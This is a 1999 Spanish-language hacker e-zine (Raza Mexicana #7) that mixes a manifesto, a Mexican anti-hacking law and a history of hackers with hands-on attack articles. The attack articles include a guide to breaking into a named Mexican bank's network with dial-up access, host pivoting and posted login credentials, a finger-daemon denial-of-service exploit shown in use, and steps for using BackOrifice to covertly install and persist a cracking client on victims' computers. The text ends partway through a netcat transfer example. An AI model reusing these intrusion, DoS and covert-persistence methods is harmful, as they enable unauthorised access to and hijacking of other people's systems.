Ŀ ۲ R A Z A M E X I C A N A T E A M #7 ۰ Julio 1999 ooooooo oo oooooo oo $$""$$" o$"$$ """$$ o$"$$ $$o$$" $$ $$ $$ $$ $$ $$$$$ $$ $$ $$" $$ $$ $$" $$ $$$$$$$ o$" $$$$$$$ $$ "$$ $$ $$ o$$oooo $$ $$ o$ o$ $$$$$$ '$o o$' $$ $$$$ oo o$ o$ oo o$$ $$$o $$ '$o o$' $$' o$"$$ o$$ $$ o$"$$ $$ $$ $$ $$ $$ $$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$$" $$$ $$ $$o $$$$$$$ $$ $$$$ $$ $$ $$ $$ $$ $o o$ $$ $$o $$ $$ $$ $$$ $$$$$$$ $$ $$ $$$$$$ $o o$ $$ $$$$ $$ $$ $$ o$ $$ $$ ------------------------------------------------------------------- La Revista de la RaZa para la RaZa de SysAdmins, Hackers, FreeJacks Crackers, Cyberpunks, Wannabes, Phreakers, Warez d00dz y lindas nenas >< -----/\/][ C O N T E N I D O ][\/\------ 01 Bienvenida ..................................... Editor 02 Declaracion de Libertad ........................ Nb@dN 03 Ley Anti-Hack .................................. Vlad 04 Hacker'S La Historia ........................... DarkAngel 05 Hack al Banco .................................. Satmex 06 Fuck Fingerd ................................... dr_fdisk^ 07 BO para Diversion .............................. Nahual 08 User Datagram Protocol ......................... Yo_Soy 09 Netcat 1.10 .................................... Nahual 10 Manejo del Puerto Paralelo ..................... Kukulkan 11 El verdadero Y2K ............................... BadBit 12 Fuck Intel ..................................... 12r 13 Windoze NT ..................................... SuFfeRbOY- 14 Wingates y Chucherias .......................... Deadsector 15 GNU - GPL ...................................... xDAWN 16 Dream .......................................... Megaflop 17 Las Aventuras de HaBit0 ........................ BadBit 18 Noticias ....................................... Topo 19 Llaves PGP ..................................... RMHT 20 Despedida ...................................... RMHT >< >< -----/\/][ B I E N V E N I D A ][\/\------ Encegados muchas noches en esta red, y seguimos en el entorno mas RaZa menos newbies y existiendo siempre quien quiera frenar obstaculizar y chingar, pero desde siempre, Aqui Estamos =;-) Han existido, desde sus inicios diversos proyectos de la RaZa e individuales viendo atras bastantes aos, algunos de los cuales los Concretamos como grupo,el cual se presento hace casi un ao con el primer boletin de la Raza Mexicana en septiembre de 1998 ahora despues de ao y medio de la activacion del canal en IRC, nos inspiramos y creamos nuestro dominio [de manera legal, a contrario de otros "Teams" *carderos* =;-P ] nos registramos en diversas maquinas de busqueda y nos visualizamos en la prensa, estaciones de radio locales de diferentes estados de Mexico, en el WWW y por supuesto en revistas impresas =;-) tenemos nueva pagina, ahora mas contenido, computacion subterranea, hacking siempre, no warez, cracks, ni anarquia en nuestro sitio en la Red, la RaZa ha brindando ayuda a varios admins y al mismo tiempo divirtiendose, en la red el canal, los meetings, cvca... despresiando interna y personalmente a Telmex XD y burlandome de las burdas copias que han aparecido de la RaZa =:-/ asi como de aquellos que creen que esto es facil, si, ellos saben quienes son, y aun asi seguimos deleitandonos.... Y levantando envidias. Ahora este nuevo archivo, el numero 7 con 159.035.392 bits de informacion, sin hacerlos esperar mas y como siempre en-linea =:-) agradeciendo al camarada Yo_Soy su fina colaboracion como editor del #5 y #6, indispensables. Sigo con mi idea, ahora hablamos de Y2K, Pentium III, NT, UDP, GNU, Cyber, Wingates, NetCat, BO, Hacking, mas programas de la RaZa (algunos solo disponibles para el canal) y un nuevo exploit. Les dejo la llave publica de la RaZa, y a pesar de la cantidad de de correo electronico que recibimos [gracias], no incluyo ningun texto que no pertenezca al contenido que he querido. Acepto sugerencias, mentas y alabanzas O:-) pero nada que no este encriptado con PGP. -=:[ Raza Mexicana Team ]:=- Editor: xDAWN www.raza-mexicana.org Xdawn@BigFoot.com >< >< -----/\/][ P U B L I C A C I O N ][\/\------ Recomendamos los siguientes sitios a la vez que son los mas CoNfIaBlEs para bajar la revista de la Raza Mexicana: http://www.raza-mexicana.org Raza Mexicana Team http://raregazz.acapulco.uagro.mx RareGaZz Team http://www.vanhackez.com Taberna de VanHackez http://members.tripod.com/~thegradvirus Pagina de DC-Virus http://www.bigfoot.com/~darkangelweb Pagina de Darkangel http://members.xoom.com/zine_store Pagina de Mau http://www.rhd.cl/e-zines/ Pagina de Kamarazov www.geocities.com/SiliconValley/Hills/8747 Pagina de u_Taker http://alpedos-team.org Alpedos Team >< >< __________________/\:][ LIBERTAD PARA LA EXPRESION ][:/\_________________ Este medio electronico informatico contiene temas de caracter didacta cientifico e informativo sobre temas de programacion, redes, crackeo computacion blanda y underground informatico, cualquier cosa que realices con esta informacion y/o conocimientos adquiridos es bajo tu propia responsabilidad, ni los autores de los articulos ni el editor se responsabilizan de TUS acciones... RaZa Mexicana Team "Es inviolable la libertad de escribir y publicar escritos sobre cualquier materia. Ninguna ley ni autoridad puede establecer previa censura, ni exigir fianza a los autores..." Constitucion Politica de los Estados Unidos Mexicanos >< >< DECLARACION DE LIBERTAD por Nb@dN En este mundo de locos y de cuerdos creci en un habiente que no era para mi. Me crie con un sistema el cual no me pertenece,y que nunca me ha pertenecido Me contamine con la basura que me arrojaron y me converti en lo que ellos querian que me convirtiera. No acepto lo que soy por que se que puedo ser mas, no acepto la basura por que yo soy humano y no pseudo hombre, no acepto la sociedad que me llevo a ser lo que ahora soy , por que no soy parte de ella. Hermanos abri los ojos a un mundo que no quiere que pensemos, y si lo hacemos, no quiere que nos reproduzcamos. Esta vida tiene algo mejor y nosotros podemos serlo. Cuando pensemos que estamos al borde de un colapso y veamos que nadie nos puede ayudar busquemonos entre nosotros y asistamonos como humanos que somos. Logremos unificar pensamientos y espiritus para una verdadera libertad, la libertad de la palabra y de el pensamiento, la libertad de el espiritu y de la belleza, la libertad de el corazon. Nuestras mentes tienen que ser superiores a lo que nos han dicho que son, si solo uno de nosotros logra alcanzar el verdadero vinculo con el mundo que nos rodea y saca de ello una enseanza debe comunicarla al resto de nosotros de manera que el mensaje se multiplique y fluya por nuestros espiritus hasta alcanzar la inmortalidad. Hermanos esto no es una idea producto de un amago de locura ni una verdad producto de una revelacion divina, esto es un manifiesto, esto es la declaracion de libertad de el pensamiento y el alma unidas para la evolucion de nuestra raza, la raza sin color ni fronteras, la raza de la sabiduria, nuestra RaZa. No nos contaminemos con el fruto de una libertad de consumo ni con pensamientos de odio hacia nuestros propios hermanos por cosas materiales, liberemos nuestros espiritus hacia la conciencia de nosotros mismos, eso nos hace seres humanos. Hermanos a partir de hoy y para siempre nos declaramos libres y unicos, hasta que lleguemos a ser mas humanos que lo humano. >< >< Ley Anti-Hack Por Vlad El dia 17 de Mayo de 1999 en el Diario Oficial se publico lo siguiente: Acceso ilicito a sistemas y equipos de informatica Articulo 211 bis 1.- Al que sin autorizacion modifique, destruya o provoque perdida de informacion contenida en sistemas o equipos de informatica protegidos con algun mecanismo de seguridad, se le impondran de seis meses a dos a~os de prision y de cien a trescientos dias multa. Al que sin autorizacion conozca o copie informacion contenida en sistemas o equipos de informatica protegidos con algun mecanismo de seguridad, se le impondran de tres meses a un ao de prision y de cincuenta a ciento cincuenta dias multa. Articulo 211 bis 2.- Al que sin autorizacion modifique, destruya o provoque perdida de informacion contenida en sistemas o equipos de informatica del Estado, protegidos con algun mecanismo de seguridad, se le impondran de uno a cuatro a~os de prision y de doscientos a seiscientos dias multa. Al que sin autorizacion conozca o copie informacion contenida en sistemas o equipos de informatica del Estado, protegidos con algun mecanismo de seguridad, se le impondran de seis meses a dos aos de prision y de cien a trescientos dias multa. Articulo 211 bis 3.- Al que estando autorizado para acceder a sistemas y equipos de informatica del Estado, indebidamente modifique, destruya o provoque perdida de informacion que contengan, se le impondran de dos a ocho aos de prision y de trescientos a novecientos dias multa. Al que estando autorizado para acceder a sistemas y equipos de informatica el Estado, indebidamente copie informacion que contengan, se le impondran de uno a cuatro aos de prision y de ciento cincuenta a cuatrocientos cincuenta dias multa. Articulo 211 bis 4.- Al que sin autorizacion modifique, destruya o provoque perdida de informacion contenida en sistemas o equipos de informatica de las instituciones que integran el sistema financiero, protegidos por algun mecanismo de seguridad, se le impondran de seis meses a cuatro aos de prision y de cien a seiscientos dias multa. Al que sin autorizacion conozca o copie informacion contenida en sistemas o equipos de informatica de las instituciones que integran el sistema financiero, protegidos por algun mecanismo de seguridad, se le impondran de tres meses a dos a~os de prision y de cincuenta a trescientos dias multa. Articulo 211 bis 5.- Al que estando autorizado para acceder a sistemas y equipos de informatica de las instituciones que integran el sistema financiero, indebidamente modifique, destruya o provoque perdida de informacion que contengan, se le impondran de seis meses a cuatro aos de prision y de cien a seiscientos dias multa. Al que estando autorizado para acceder a sistemas y equipos de informatica de las instituciones que integran el sistema financiero, indebidamente copie informacion que contengan, se le impondran de tres meses a dos aos de prision y de cincuenta a trescientos dias multa. Las penas previstas en este articulo se incrementaran en una mitad cuando las conductas sean cometidas por funcionarios o empleados de las instituciones que integran el sistema financiero. Articulo 211. bis 6.- Para los efectos de los articulos 211 bis 4 y 211 bis 5 anteriores, se entiende por instituciones que integran el sistema financiero, las sealadas en el articulo 400 bis del este Codigo. Articulo 211 bis 7.- Las penas previstas en este capitulo se aumentaran hasta en la mitad cuando la informacion obtenida se utilice en provecho propio o ajeno. Al parecer el Gobierno se esta cansando de que sus servidores sean continuamente hackeados y para no verse tan obvios decidieron legislar para particulares, sistema financiero y el mismo Estado. A que le tiene miedo el Estado?, a que un dia alguno de nosotros encuentre informacion que les perjudique si se divulga?, que se encuentre informacion que lleve a fondos mal empleados?, a que se sepa que algunos de ellos goza gastando fondos en visitar sitios pornos?. El movimiento Hack en Mexico ha ido en incremento en una forma considerable y una forma de frenarlo es legislando al respecto, diseando leyes con la esperanza de que algun dia caiga alguien y ponerlo de ejemplo para los demas hackers. Ahora es tiempo de andarese con mas cuidado, hacer no solo uso del proxy sino un abuso del proxy. Y que este tipo de leyes pendejas no frenen el movimiento Hack en Mexico. Para los proxymos numeros en el rincon de las leyes encontraras (eso espero): - Derechos de autor sobre programas de computo. - Libertad de prensa y de expresion. - Uso legal e ilegal de sistemas de computo. - Revelacion de secretos. - Derecho a la privacidad. Kualquier comentario, duda (de dudar y no de la otra), aclaracion, sugerencia, felicitacion, reclamacion, cita, o para lo que sea dejalo en v14d@usa.net >< >< Hacker'S La Historia. <<(Introduccion)>> Bueno en este artikulo les voy a hablar sobre los hackers en general , no no es hacer un psicoanalisis de los Hackers , simplemente es tratar de konocer mas komo todo este movimiento Hacker se ha venido(Sin albur) dando en todo el mundo y conforme a los avancez de la Teknologia (en realidad son avancez? no se kreo ke si bueno ahora ya hay MDs =) ). Y pues las BIOS de los mas famosos hacker's ke muchos de ustedes ya konocen y muchos otros ni sabian ke existian.Tal vez para el proximo artikulo pues trate sobre Scripting II , Java Class o ya sabes Ingenieria social o hasta un poko de kocina =) . <<(Historia)>> -=(Prehistoria(Antes de 1969)=- Al principio existia una compaia telefonika , para ser mas exaktos: La nueva marca de telefonos "BELL".Y fue alli donde nacieron los Hacker's pero por supuesto en 1878 ellos aun no eran llamados hackers ,Solo Bromistas Pesados , chavos ke encendian los tableros y quienes tenian una infortunada predileccion para desconektar y redireccionar llamadas("No aki no vive rosa mel cacho! Operadora! kien esta en la linea? Hola?") Ahora ya sabes porke la primer kompaia transcontinental de comunikaciones contrato operadoras femeninas XDD Y en un momento de divagacion llegamos a 1960 donde empezaron los primeros y autentikos Hacker's de las komputadoras. Komo la nueva y principiante generacion de PrankSters de telefonos MIT GeeKS tuvo una insetable curiosidad acerca de komo las kosas funkaban(todo el hacker y el GonaBe la tienen no? ) En esos dias las komputadoras eran las principales estrukturas , protegidas de las temperaturas, kon kontrol de temperatura y capas de cristales. Encender estos lentos pedazoz movibles de metal kostaban muchisimos Dolares; y los programadores tenian un accesso limitado a los Dinosaurios , komo se les llamaba. Por lo ke los mas listos krearon algo a lo ke ellos llamaron "hacks" -- programming shortcuts -- (Accessos direktos programados) estos para kompletar las tareas de las komputdoras mas rapido. Aveces sus accessos direktos eran mas elegantes ke el programa Original. Talvex el mejor hack de todos los tiempos fue el kreado en 1969, kuando dos empleados de los Laboratorios "Bell" pensaron en un tanke ke viniera con un set de reglas para hacer funkar makinas en la frontera. Dennis Ritchie y Ken Thompson llamaron a su nuevo systema : Systema Operativo Estandar; UNIX. Era una Belleza :) -=(Dias Mayores(1970-1979)=- En los 70s la cyber frontera estaba ampliamente abierta.El Hacking era en si solo explorar y figurar afuera de el trabajo del mundo Kableado. Al rededor de 1971 un veterano vietnamita llamado John Draper descubrio que el silbido producido desde lejos en la caja de cereal del Capitan Crunch reproducia perfectamente el tono de 2600 megahertz.Simplemente emitia el silbido en el recibidor de telefono para hacer llamadas gratuitas; Gracias por usar AT&T.XDD. Abbie Hoffman todo un guru de la Subcultura siguio los pasos del capitan extendiendo todos los conocimientos y con la joven e internacional Linea de fiesta y Noticias creando la palabra de como conseguir llamadas telefonicas gratuitas: "Phreaking" el kual no hirio a nadie , el argumento fue, que las llamadas telefonicas emanaron de un deposito ilimitado. Los verdaderos creyentes han acumulado en el "mente-numbingly" articulos tecnicos muy complejos y Sekretos durante dos dekadas. Es aki donde komo veras aparecio el Phreaking ke ahora ataka a la telefonia celular =) . -=(La Edad Dorada (1980-1991)=- En 1981 IBM anuncio un nuevo modelo de makina autosuficiente, totalmente equipada con: CPU, software, memoria, utilidades, almacenamiento. Ellos la llamaron la "Komputadora Personal." Podias ir a cualkier parte y hacer lo ke fuera kon una de estas Teknlogias de punta. Pronto los nios abandonaron su Chevys(Juegos) para explorar lo mas profundo de un "Commie 64" o un "Trash-80." En 1983 tras la pelikula "Juegos de Guerra" dieron a luz como un rayo la cara oculta del Hacking y advirtio al Publico ke Lokos tras komputadoras podian entrar en kualkier systema de una komputadora.Estos lokos (komo ellos los llamaban) dejaban disintos mensajes de la pelikula.Asi ke estos Hacker's tambien podian konseguir morritas muy Listas y bonitas. El territorio estaba kambiando , muchos estraos y ajenos se acerkaban y movian entorno al mundo en Linea(Online World) ARPANET se estaba conviertiendo en Internet, y la popularidad de los tableros de mensajes se habia expandido. En Milwaukee un grupo de hackers ke ellos mismos se autonombraban: Los 414's(su codigo de area. Duh.) ke se dedicaban a romper systemas desde institucuiones de los alamos hasta laboratorios de Manhattan(Memorial Sloan-Kettering Cancer Center). Fue cuando la policia puso sus brazos y sus miradas sobre akellos lokos de las komputadoras. La Gran Guerra de los Hacker'S Para llegar al punto de partida de la Gran Guerra de los Hackers, probablemente tendras ke remontarte al ao 1984, kuando un chavo ke se llamaba a si mismo:"Lex Luthor" fundo la legion "Of Doom!".Llamado usualmente LOD , tenia la reputacion de atraer a lo mejor de lo mejor -- hasta ke uno de sus gangsers brillantes llamado Phiber Optik,entro en la legion de "Doomer" Los amigos de Phiber formaron un grupo rival: "the Masters of Deception". Empezando en 1990 LOD and MOD comenzaron algo ke talvez no podrian manejar... Durante dos aos de Guerra Online komo le podriamos llamar ellos se kombatian legion kontra legion , interfiriendo Lineas , Monitoreando Llamadas, Entrando en cada una de las komputadoras del contrinkante. Entonces las legiones kayeron: Signifikaba la karcel para Phiber y sus amigos. Era el fin de un era; "The grat Hacker's War". -=(Crackdown (1986-present)=- Kon la entrada del gobierno al mundo online la diversion akabo =( ni pex , Solo para mostrar ke ellos signifikaban negocios, el Congreso edikto una ley en 1986 llamada: "the Federal Computer Fraud and Abuse Act." Entonces llego: Robert Morris con su Bichito de internet ( Internet worm ) en 1988. Congelando y Crasheando 6,000 Net- Computadoras Enlasadas , entonces fue kuando Morris tuvo la gran distincion de ser la primera persona convicta bajo el Act's computer-crime provision. Mulata $10,000 bolas y muchisimas horas de servicio a la komunidad. Pronto tuvieron ke komprarse una tarjeta de Scores o en espaol mejor dicho una tarjeta de markadores para mantenerse kon el kreciente numero de arrestos. En ese mismo ao Kevin Mitnick korrompio en el ekipo Network de la kompaia de ekipo digital fue rekluido y sentenciado a un ao en el bote. Fue kuando el kevin 2 komo podriamos llamarle a -- Kevin Poulsen -- tenia keragos de llamadas pero astutamente logro evadir el largooo brazo de la ley por 17 meses. Operacion Sundevil fue el nombre ke el gobierno le dio a esta operativa en 1990 ke pretendia romper kon todos los Hackers de todo el pais incluyendo a la "The Legion of Doom!". Simplemente no Funko =). Pero al siguiente ao el Crackdown Redux dio resultados sentenciando en el bote a 4 miembros de los maestros de la desepcion:"The Masters of Deception!". Phiber Optik estuvo un ao en una carcel federal o bote federal komo prefieran =P. En Febrero de 1995 Kevin Mitnick fue arrestado de nuex , esta vez el FBI lo akusaba nadamas de haberse robado 20,000 numeros de tarjetas de kredito , desgraciadamente ahora fue mas de un ao el ke estuvo en el bote hasta abril del 96 ke ahora tenia problemas por usar telefonos celulares ilegales. -=(Tolerancia Zero (1994-present)=- Viendo a Mitnick lleno de kadenas en la Television Nacional dieron una imagen ke no beneficiaria pero en lo mas minimo a los Hacker's.Ahora los usuarios de la Net estaban aterrados de los hackers los kuales usaban herramientas komo: "password sniffers" para obtener informacion Privada o bien el "spoofing," kon el ke lograban ke una makina le diera accesso a los Hackers. Llamado el fin de la Anarkia , la muerte de una frontera los Hackers ya no eran conciderados Antiheroes Romantikos, solo exentrikos ke kerian aprender kosas. Pero ahora nesecitando de proteccion para los negocios en la Net de repente los hackers se konvirtieron en esta buskada proteccion En el verano de 1994 un gangster manejado por un Hacker Ruso korrompieron en las komputadoras del Citibank's e hizieron transferencias no autorizadas de mas de $10 millones junto kon otras lograron cerka de $400,000, krearon un fraude en el cyberespacio. Asi ke ke les espera a la nueva generacion de Hacker's?? ahora por citar un ejemplo en china fueron centenciados no hace mucho a muerte 2 Hackers , En Estados unidos son tratados peor ke violadores o azezinos , por otra parte la mala reputacion no ayuda en mucho Crackers,Hackers para mucha gente son lo mismo , sabiendo nosotros bien ke son las dos karas de la moneda. Aldous Huxley dijo: "Si eres un buen hacker todo mundo konoce tu nombre , pero si eres un Gran Hacker nadie sabe kien eres". -=(Hacker's Hall of Fame , hit parade?)=- Bien ahora podras konocer algo de algunos hackers , lo ke han hecho etc. Son sitios kon toda la informacion referente a los mismos.Algunos buenos otros no tanto. *Richard Stallman http://www.undergrad.math.uwaterloo.ca/~agray/meme.html *Dennis Ritchie and Ken Thompson http://cm.bell-labs.com/who/dmr/ and http://cm.bell-labs.com/who/ken/ *Handle: Cap'n Crunch http://www.webcrunchers.com/crunch *Phiber Optik http://www.levity.com/julian/phiber.html *Kevin Mitnick http://www.2600.com/kevin *Kevin Poulsen http://www.catalog.com/kevin/ *Johan Helsingius http://www.cyberpass.net/security/penet.press-release.html *Vladimir Levin http://www.spb.su/sppress/141/guilty.html -=(Konkluzion)=- Bien pues fue asi komo se desarrollo la historia de los HackerS , Y komo hasta ahora representan una amenaza a lso gobiernos , porke? ke eskonden? ke es lo ke no kieren ke deskubramos? ................... algo ke ya todos sabemos. Bueno por ultimo kiero dejarlos kon un dicho ke ya talvez muchos hasta se lo sepan de memoria: Nuestro Unico krimen es la curiosidad y ser mas listos ke ustedes algo ke jamas nos podran perdonar +++Mentor++ Bueno pues espero ke este monton de bytes te haya serivido de algo o bien pues te haya kitado un poko de tu tiempo =) , bueno kualkier komentario, duda (Duh?) , amenaza , o rayada de Madre pueden enviarlos a: WebMaster-V@ApexMail.Com , tambien se aceptan $fondos para seguir kon estos artikulos y fondos para seguir poniendo en pie mi web =) jeje , eso es todo. --==(((El Verdadero Poder esta en la Informacion)))==-- DarkAngel. Este dokumento puede ser puesto en kualkier lado siempre y kuando no se altere y se mencione al autor. Hecho para Raza-Mexicana HackerS tEAM Y MokO$oft Guindoze98. -Bye- DarkAngel *****|***************************************************************************************** /////////// ////// /////////////// /// ///// BBBBBBBBBBB/ /*******/// TTTTTTTTTTTTTT/ AAA/ LLLL/ BBBB/ BBB/ /*************/ TTTTTTTTTTTTTT/ AAAAA/ LLLL/ BBBB/ BBB/ *** IIIIIIIII ***/ TTTT/ AA/AAAA/ LLLL/ BBBB/////BBBB/ ****** IIIII ******/ TTTT/ AA/ AAAA/ LLLL/ BBBBBBBBBBBB/ ******** III ********/ TTTT/ AA/////AAAA/ LLLL/ BBBBBBBBBBBB/ ******** III ********/ TTTT/ AAAAAAAAAAAAA/ LLLL/ BBBB/ BBBB/ ****** IIIII ******/ TTTT/ AAAAAAAAAAAAAAA/ LLLL/ BBBB/ BBBB/ *** IIIIIIIII ***/ TTTT/ AA/ AAAA/ LLLL////// BBBB/////BBBBB/ *************/ TTTT/ AA/ AAAA/ LLLLLLLLLL BBBBBBBBBBBBB/ *******/ TTTT/ AA/ AAAA/ LLLLLLLLLL B A N C O I N T E R N A C I O N A L H A C K A L B A N C O P O R S A T M E X Primero que todo tienes que saber que entrar esta bajo tu responsabilidad.  P R I M E R O Si escaneas al banco Bital desde internet no te va a dejar hacer nada porque tienen firewall asi que te jodistes, ntc XD. Para poder entrar en su red (tener su IP para que te deje entrar el server) para eso tienes que marcar un numerito de telefono. El numero es #0180050140 (talvez necesites otros 2 ceros) Pero primero tienes que configurar la coneccion para que se te aparezca la ventana de la terminal. Despues de que marcas aparecera la ventana de la terminal pidiendote login y passwd, he ahi el error cuando te pida login le pones cualquier cosa (ej.kiddie password:you_are_or_iam) y va a marcar acces denied entonces lo vuelves a hacer hasta la 3era vez, despues que te marque acces denied tu le das continue (f7 para los de winblows) y te conectara a la velocidad de 9600bps (si no te aparece el login y password presiona unos breaks y estaras dentro con una ip que el firewall reconoce como confiable. Ahora ya puedes hacer telnet a www.bital.com.mx ----------------- IRIX X.X LOGIN: PASSWORD: ------------------------- Tambien hay varios dominios, por ejemplo: webprod.bital.com.mx y te va a aparecer un : ------------------------------- Unix v.4 LOGIN: PASSWORD: ---------------------------------------- Casi todos los servers tienen cuentas defaults y tienen abierto el finger Te podria dar la clave de root pero hay que ensearles a pescar no a darles los peces. La verdad esta facil ya adentro tienen las unix y de verdad que si tienen un bug. Asi como esas hay varias maquinas, como tambien esta la sip_2000, pero recuerda que cuando te conectas a una de ellas le puedes dar un "cat /etc/hosts" y te aparecen los nombres de otras computadoras que no las puedes acesar directamente pero si por medio de ese servidor. Ejemplo: ---------------------------------------------------------- telnet webprod.bital.com.mx unix v.4 USERNAME:root PASSWORD:ladelrootxD welcome #cat /etc/hosts sip_2000 123.123.123.ip.ip.etc otro ip otro ip #telnet sip_2000 attemping conecction unix v.4 LOGIN: PASSWORD: ---------------------------------------------------------- Dentro puedes encontrar bases de datos de informix, y checar muy buenos mails =). Cosa que no la puedes hacer directa desde tu telnet sino desde dentro de el server, usa tu inmaginacion (ej. abrir tu server de ftp y desde el server le das ftp tu_ip subes un exploit,etc,etc, recuerda que hay muchos servers te combiene usar un wingate scan u otro que escanee rangos de ip por un determinado puerto. Para los lamahz que no quieren batallar ahi les va una cuenta en webprod.bital.com.mx usuario:sys password:hacker $ Y ponte a usar tu inmaginacion :P SatMex >< >< ===============[ Fuck-Fingerd denial of service exploit ]================== coded by dr_fdisk^ dr_fdisk@hotmail.com Denial of service como la palabra lo dice.. quiere decir denegacion de servicio.. o sea.. cuando realizamos un ataque de este tipo a algun host lo que hace es cerrar las conexiones al puerto al que le enviamos los paquetes. Por ej.. el Novell NetWare webservers remote denial of service Yo descubri un denial que afecta al puerto 79 (finger), al cual le mando un buff que execede los 39 caracteres en forma de looping... Hasta ahora son vulnerables todas las distribuciones de Linux, algunos box de Sunos viejas, HP-UX no lo probe. El fuck-fingerd puede causar en maquinas con menos de 8mb que la pc se cuelgue... pero en maquinas veloces lo que hace es un denial al port 79 gracias al syslogd que cierra el servicio... [===-Este es el mensaje que graba el syslogd..-===] Feb 21 20:25:35 pc1 inetd[18141]: finger/tcp server failing (looping),service $ Aca hagamos un prueba en una maquina veloz: pc1:/# finger root@debian.darkhost.org Login: root Name: dr_fdisk^ Directory: /root Shell: /bin/bash On since Thu Feb 21 20:08 (CET) on tty1 (messages off) On since Thu Feb 21 19:52 (CET) on tty2 48 seconds idle (messages off) No mail. No Plan. pc1:/# fuck-fingerd Fingerd Daemon Crasher exploit by dr_fdisk^ RaZa-MeXiCaNa TEAM www.raza-mexicana.org uso : fuck-fingerd ip Si el demonio del finger no cae prueba 1 o 2 veces mas pc1:/# fuck-fingerd debian.darkhost.org Ahora probamos si cayo el servicio.... pc1:/# finger root@debian.darkhost.org [debian.darkhost.org] finger: connect: Connection refused pc1:/# En una maquina lenta lo que ocurriria en la otra pc seria esto: ej: pc2:~# Unable to load interpreter Unable to load interpreter Unable to load interpreter Unable to load interpreter Luego linux reinicia la pc ya que hagoto la memoria... Esto lo probe en una Pentium 166Mhz con 8mb ram con Redhat 5.2 cualquier duda, comentario enviame un email a: dr_fdisk@hotmail.com el binario para linux esta disponible en packetstorm c-ya! >< >< BACKORIFICE PARA DIVERSION Y GANANCIAS MONETARIAS Por Nahual BackOrifice (BO) es un programa para administracion, monitoreo, y control de sistemas remotos. La definicion original de sus creadores, la cDc, es "...un programa de tipo cliente/servidor que le permite al software cliente monitorear, andministrar, y realizar otras funciones de redes y multimedia sobre la maquina que este corriendo el servidor." El servidor solo corre en sistemas Windows 9X. En cambio, hay versiones del cliente para Unix y para Windows. Y dentro de estas dos variantes, existen versiones CLI y GUI. BackOrifice tiempo de haber salido, y tal vez no sea tan popular como otros programas similares, como Netbus. Pero, aunque no parezca tan facil de usar, es tanto o mas potente que la mayor parte de programas de este tipo. En parte porque es posible agregarle funcionalidad al servidor escribiendo unos modulos conocidos como "plugins", puede usarse en conjunto con netcat, nos permite editar el registro de windows, etc. En este articulo usare los comandos usados en las versiones de texto. Son iguales en sus versiones de Windows y Unix. Y son practicamente identicos a los de las versiones graficas. Para quienes no esten familiarizados con BO: *El comando sweep xxx.xxx.xxx.* sirve para escanear una subnet por puertos abiertos por BackOrifice. *En las versiones CLI, el comando host xxx.xxx.xxx.xxx sirve para conectarnos a cierta victima. Sin mas rollo, algunos ejemplos de cosas que se pueden hacer con BackOrifice: ----- A) Una vez mi novia me dio permiso de instalarle un troyano para ayudarle a arreglar su sistema, que tenia una serie de problemas, y elegi BackOrifice. No vivimos en la misma ciudad, por cierto. Parece que se lo deje instalado por guey, o tal vez alguien mas lo instalo despues. El caso es que me urgia quitarselo. BackOrifice era mi unica herramienta...can can can can! 1) Escribe este comando: regdelval HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ No hay un valor en ...RunServices\ , pero por lo general lo hay, como en el ejemplo siguiente, de rc5des. Y recuerda, NO cometer el error de usar el comando regdelkey! borraria todo lo que contenga esa llave, aparte del registro del servidor BackOrifice. 2) Comando: proclist Habra un archivo llamado .exe Por lo general estara en c:\windows\system\ Al encontrarlo, toma el numero del proceso que estara en la columna izquierda; lo usaremos en el paso 3. 3) Comando: prockill XXXXXXXXXX Donde XXXXXXXXXX es el numero del proceso. Antes de darle mate al proceso, seria conveniente avisarle a la persona que borre el programa c:\windows\system\exe~1. Esto puede hacerse con el comando dialog "borra c:\windows\system\exe~1" "mensaje de nahual" O podria bajarse su archivo autoexec.bat, y alterarlo para que borre ese mismo archivo cuando reinicien su computadora. En cualquier caso, el paso final es eliminar el proceso con prockill. FIN: Eso es todo! aunque no borren el archivo .exe, no importa tanto, puesto que la computadora ya no correra el servidor al inicierse Windows. ----- B) Como parte del proyecto RC5-64, y dado que la velocidad de mi procesador actual me da verguenza, decidi reclutar procesadores de computadoras que tuvieran el servidor BackOrifice instalado. 1) Baja la version CLI del cliente RC5DES para Windows. 2) Correlo en tu sistema, y configuralo para que tenga tu correo electronico. Definitivamente hay que usar uno que no apunte hacia ti! Una vez instalado el cliente en la computadora remota, el archivo de configuracion rc5des.ini contendra ese correo. 3) Aparte, configuren el cliente para que corra en el fondo, sin que haya salida de datos (es decir, sin output). El indicador de procesamiento puede estar encendido o apagado, puesto que de todas maneras no vamos a permitir salida de datos. 4) Escribir esto: httpon 80 c:\ Donde 80 es el puerto, y c:\ es el directorio raiz que usaremos. El puerto podria ser cualquier otro que no este ocupado. De hecho, algunas veces el puerto 80 ya esta siendo usado; en ese caso es necesario usar otro. El directorio raiz puede ser cualquier otro tambien. c:\windows\system tiene una gran cantidad de archivos, y podemos esconder nuestro cliente rc5des ahi, sin que sea muy notorio. 5) Conectate a: http://victims.address.net:80 80 es el puerto default, y no hay que ponerlo. Pero si usas un puerto diferente, si hay que ponerlo. Navega al directorio deseado, como c:\windows, o lo que sea. 6) Al final de la pagina que nos presente el navegador, presiona Browse, y encuentra el archivo rc5des.exe, y presiona upload. Hacer lo mismo con el archivo rc5des.ini, el archivo de configuracion. 7) Escribe: procspawn c:\windows\system\rc5des.exe Eso ejecutara el cliente. 8) Encuentra un host con Backorifice, y escribe: regsetval HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\rc5 S,c:\windows\system\rc5des.exe Si quieres asegurarte de que no este ya corriendo rc5des.exe, usa el comando proclist. FIN: Listo. El cliente rc5des se activara cada vez que la computadora remota abra Windows. Instala el cliente en todas las computadoras que puedas, para que te vaya mejor en el concurso RC5-64. Chance y te ganes los 1000 o 2000 dolares ;). El unico pedo es que en archivo de configuracion rc5des.ini esta tu e-mail, pero si la persona no ha detectado que esta corriendo el servidor BackOrifice, es poco probable que encuentre el cliente rc5des. Ademas, no les causa problema alguno, y al no ser un virus ni troyano, ningun detector lo notara. ----- C) Luego es mucho problema andar usando HTTP para andar subiendo y bajando archivos. Sobre todo si andas en una consola de Unix sin acceso a X-window y, por lo tanto, sin acceso a un browser grafico (lynx no sirve en este caso). La solucion es sencilla. Los ingredientes: BackOrifice y netcat. (http://www.raza-mexicana.org para mayor informacion sobre netcat) 1a) Desde ms-dos: nc -v -l -p 3333 < archivo Para mandar un archivo al host remoto 2a) Desde BackOrifice: tcprecv c:\archivo xxx.xxx.xxx.xxx:3333 Para conectarse al puerto 3333 (o el que sea) del host especificado, y 